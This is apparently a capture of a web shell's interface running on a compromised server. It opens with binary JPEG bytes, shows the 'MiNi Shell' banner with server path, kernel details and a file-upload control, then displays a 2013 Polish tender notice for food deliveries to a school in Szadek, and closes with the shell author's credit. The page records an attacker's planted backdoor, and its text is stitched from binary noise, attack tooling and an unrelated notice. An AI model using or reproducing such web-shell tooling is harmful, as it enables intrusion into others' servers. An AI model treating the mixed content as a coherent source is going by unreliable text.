JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130205/48370-N-2013.html

<p class="kh_header"><b>Szadek: Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości powyżej 14 000 Euro, nie przekraczającej 200 000 Euro na dostawę artykułów żywnościowych dla Z. P. G. i S. P. w Szadku.</b><br>
<b>Numer ogłoszenia: 48370 - 2013; data zamieszczenia: 05.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Publicznego Gimnazjum i Szkoły Podstawowej w Szadku , ul. Prusinowska 4, 98-240 Szadek, woj. łódzkie, tel. 43 821 50 31, faks 43 821 50 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szadek.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół i Placówek Oświatowych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości powyżej 14 000 Euro, nie przekraczającej 200 000 Euro na dostawę artykułów żywnościowych dla Z. P. G. i S. P. w Szadku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest dostawa artykułów żywnościowych w roku 2013. Przedmiot zamówienia został podzielony na 10 pakietów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust.1 pkt. 7 Ustawy na poziomie 20 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.22.00.00-6, 15.80.00.00-6, 15.51.00.00-6, 15.86.00.00-4, 15.83.00.00-5, 15.82.00.00-2, 15.81.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego przez Wykonawcę załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego przez Wykonawcę załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego przez Wykonawcę załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego przez Wykonawcę załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego przez Wykonawcę załącznika nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szadek.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Publicznego Gimnazjum i Szkoły Podstawowej w Szadku
ul. Prusinowska 4
98-240 Szadek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2013 godzina 10:00, miejsce: Zespół Publicznego Gimnazjum i Szkoły Podstawowej w Szadku
ul. Prusinowska 4
98-240 Szadek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przetwory  sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Cukier	1 kg	kg	950 
2.		Cukier puder	400 g	Szt.	15 
3.		Proszek do pieczenia	30 g	Szt.	10 
4.		Cukier wanilinowy	32 g	Szt.	100 
5.		Drożdże	1kg	kg	6 
6.		Mąka pszenna	1 kg	kg	800 
7.		Mąka ziemniaczana	1kg	kg	10 
8.		Ryż	1 kg	kg	70 
9.		Ryż w saszetkach	400 g	Szt.	300 
10.		Kasza manna	1 kg	kg	50 
11.		Kasza jęczmienna średnia	1 kg	kg	500 
12.		Kasza gryczana	1 kg	kg	100 
13.		Sól	1 kg	kg	280 
14.		Pieprz mielony	20 g	Szt.	250 
15.		Pieprz ziołowy	20 g	Szt.	300 
16.		Pieprz ziarno	20 g	Szt.	50 
17.		Papryka słodka mielona	20 g	Szt.	400 
18.		Majeranek	20 g	Szt.	300 
19.		Liść laurowy	6 g	Szt.	50 
20.		Ziele angielskie	15g 	Szt.	50 
21.		Kwasek cytrynowy	20 g	Szt.	200 
22.		Przyprawa do kurczaka	20 g 	Szt.	150 
23.		Przyprawa do zup i mięs (np. Degusta lub Wegeta) 	400g	Szt.	30
24.		Kostki rosołowe ( różne)	200 g	Szt.	50 
25.		Groszek konserwowy	400 g	Szt.	100 
26.		Kukurydza konserwowa	400 g	Szt.	100 
27.		Przyprawa w płynie do potraw np. Knorr	1040g	Szt.	10 
28.		Sos sałatkowy	20 g	Szt.	50 
29.		Przyprawa do mięs	200 g	Szt.	40 
30.		Sałatka szwedzka	3 l	Szt.	45 
31.		Pomidor b/s puszka	3 l	Szt.	5 
32.		Przyprawa grillowa	20 g	Szt.	150
33.		Oregano	20 g	Szt.	50 
34.		Bazylia	20 g	Szt.	50 
35.		Kminek	20g	Szt.	30 
36.		Sos do spaghetti  w słoiku	520 g	Szt.	250 
37.		Sos boloński w słoiku	520 g	Szt.	100 
38.		Sos słodko- kwaśny w słoiku	520 g	Szt.	100 
39.		Sos grzybowy w proszku	20 g	Szt.	80 
40.		Sos pomidorowy w proszku	20 g	Szt.	100 
41.		Rodzynki	500 g 	Szt.	50 
42.		Koncentrat pomidorowy(Kotliny)	0.900 l 	Szt.	100 
43.		Ketchup łagodny	0.5 l  	Szt.	50 
44.		Syrop żurawinowy (np. Paola)	430 ml	Szt.	200 
45.		Syrop malinowy (np. Paola)	430 ml	Szt.	200 
46.		Syrop truskawka (np. Paola)	430 ml	Szt.	200 
47.		Syrop wiśnia (np. Paola)	430 ml	Szt.	200 
48.		Bułka tarta	0.5 kg	Szt.	500 
49.		Makaron świderki ( np. Lubella)	500 g	Szt.	350 
50.		Makaron rosołowy nitka ( np.Czaniec)	250 g	Szt.	320 
51.		Makaron wstążka cięta ( np. Lubella)	500 g	Szt.	250 
52.		Makaron rurka (np. Lubella)	500 g	Szt.	150 
53.		Makaron do spaghetti (np. Lubella)	400 g	Szt.	450 
54.		Koncentrat buraczkowy  (np. Krakus)	330 ml	Szt.	60 
55.		Ocet jabłkowy	300ml	Szt.	10
56.		Olej kujawski	1l	Szt.	850 
57.		Barszcz biały	1l	Szt.	150 
58.		Żurek papierek	20 g	Szt.	300 
59.		Musztarda	200 g	Szt.	50 
60.		Chrzan tarty słoik	200 g	Szt.	50 
61.		Majonez  (np. Winiary)	700 g	Szt.	100 
62.		Kisiel  ( różne smaki)	58 g	Szt.	800 
63.		Herbata  w saszetkach	Op. 300 szt.	Szt.	10 
64.		Galaretka ( różne smaki)	75 g	Szt.	180 
65.		Dżem duży (różne smaki)	525g	Szt.	150 
66.		Masło czekoladowe / orzechowe np. Nutella duża	630 g	Szt.	10 
67.		Wafelki paczkowane (różne smaki)  szt.	30g	Szt.	200 
68.		Herbatniki (np. petitki)	100 g	Szt.	30 
69.		Chrupki do mleka (np. mlekołaki)	500 g	Szt.	30 
70.		Chrupki do mleka czekoladowe (np. czeko- chips)                                                                                                                                                                                                                       	500g	Szt.	30
71.		Kawa naturalna mielona ( różna)	500 g	Szt.	30 
72.		Kakao (np. Decomoreno)	250 g	Szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki                                                        	1kg	kg	10000 
Marchew  	1kg	kg	900 
Pietruszka 	1kg	kg	200 
Seler 	1kg	kg	200 
Por  	1kg	kg	200
Cebula 	1kg	kg	150 
Cebula czerwona 	1kg	kg	30 
Kapusta biała 	1kg	kg	500 
Kapusta czerwona 	1kg	kg	50 
Kapusta pekińska 	1kg	kg	300 
Kapusta kwaszona 	1kg	kg	800 
Kapusta włoska 	1kg	kg	30 
Fasola średni Jaś 	1kg	kg	150 
Burak 	1kg	kg	800 
Ogórek kwaszony 	1kg	kg	450 
Ogórek konserwowy duża puszka 	12,25 l.	Szt.	20 
Ogórek konserwowy mała puszka 	4,2 l.	Szt.	20 
Ogórek zielony 	1kg	kg	250 
Pomidor 	1kg	kg	150 
Papryka  	1kg	kg	50 
Sałata główka	1	szt.	300 
Sałata karbowana  główka	1	szt.	400 
Kalafior główka	1	szt.	200 
Jabłko 	1kg	kg	800 
Cytryna 	1kg	kg	300 
Pieczarki  	1kg	kg	150 
Szczypior ( pęczek)	1	szt.	50 
Natka pietruszki ( pęczek)	1	szt.	200  
Koperek (pęczek)	1	szt.	200
Rzodkiewka  (pęczek)	1	szt.	50 
Brokuł 	1kg	kg	150 
Fasola szparagowa  zielona 	1kg	kg	100
Czosnek świeży-  główka	1	szt.	30 
Banan 	1kg	kg	300 
Mandarynka 	1kg	kg	100 
Śliwka 	1kg	kg	10 
Gruszka 	1kg	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jaja świeże duże 	65-70 g	Szt.	15300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb krojony pszenny 	500 g	Szt.	450 
Bułka mała 	100 g	Szt.	4500
Chałka  	400 g	Szt.	50 
Angielka krojona 	400 g	Szt.	80
Pączki  	80g	Szt.	200
Bułka drożdżowa 	130 g	Szt.	200
Rogal 	100 g	Szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Masło 	250g	kg	20 
Mleko folia 2%	1l.	litry	460 
Mleko  karton 3.2%	1l.	Szt.	100 
Śmietana 18% 	400 ml	litry	250 
Jogurty 	400 g	Szt.	700
Jogurt owocowy ( różne smaki) 	125 g	Szt.	4500
Twaróg 	1kg	kg	100 
Twarożek kanapkowo- sernikowy 	1kg	kg	150 
Ser żółty  (typu Gouda)	1kg	kg	6 
Margaryna (np. Rama) 	500 g	Szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.51.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Kości wędzone 	1kg	kg	50 
2.		Schab b/k  	1kg	kg	720 
3.		Karczek b/k 	1kg	kg	800 
4.		Szynka surowa wieprzowa b/k 	1kg	kg	400 
5.		Wołowina b/k  	1kg	kg	200 
6.		Brzuch Świeży surowy b/ż 	1kg	kg	300 
7.		Boczek wędzony b/ ż 	1kg	kg	150 
8.		Kiełbasa Szynkówka 	1kg	kg	270 
9.		Pachwina wędzona 	1kg	kg	70 
10.		Parówki cienkie 	1kg	kg	100 
11.		Pasztet np. Mazowiecki	460 g	Szt.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Drób i przetwory drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Porcja rosołowa ze skrzydełkami 	1kg	kg	300 
2.		Pałka kurczaka 	1kg	kg	400 
3.		Udko 	1kg	kg	450 
4.		Filet z kurczaka 	1kg	kg	 1000
5.		Filet z indyka 	1kg	kg	800 
6.		Kiełbasa drobiowa  	1kg	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filet z miruny 	1kg	kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Garmażeria.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Kopytka 	1kg	kg	800 
2.		Śląskie 	1kg	kg	500 
3.		Pierogi z mięsem 	1kg	kg	640 
4.		Pampuchy 	100 g	Szt.	11500
5.		Pierogi leniwe 	1kg	kg	640 
6.		Pierogi z kapustą i grzybami 	1kg	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Bukiet warzyw 	1 kg	kg.	200 
2.		Truskawka 	1 kg	kg	200
3.		Wiśnia 	1 kg	kg	50
4.		Brokuły 	1 kg	kg	500
5.		Marchewka mini 	1 kg	kg	250
6.		Mieszanka wielowarzywna 	1 kg	kg	375
7.		Fasolka szparagowa 	1 kg	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com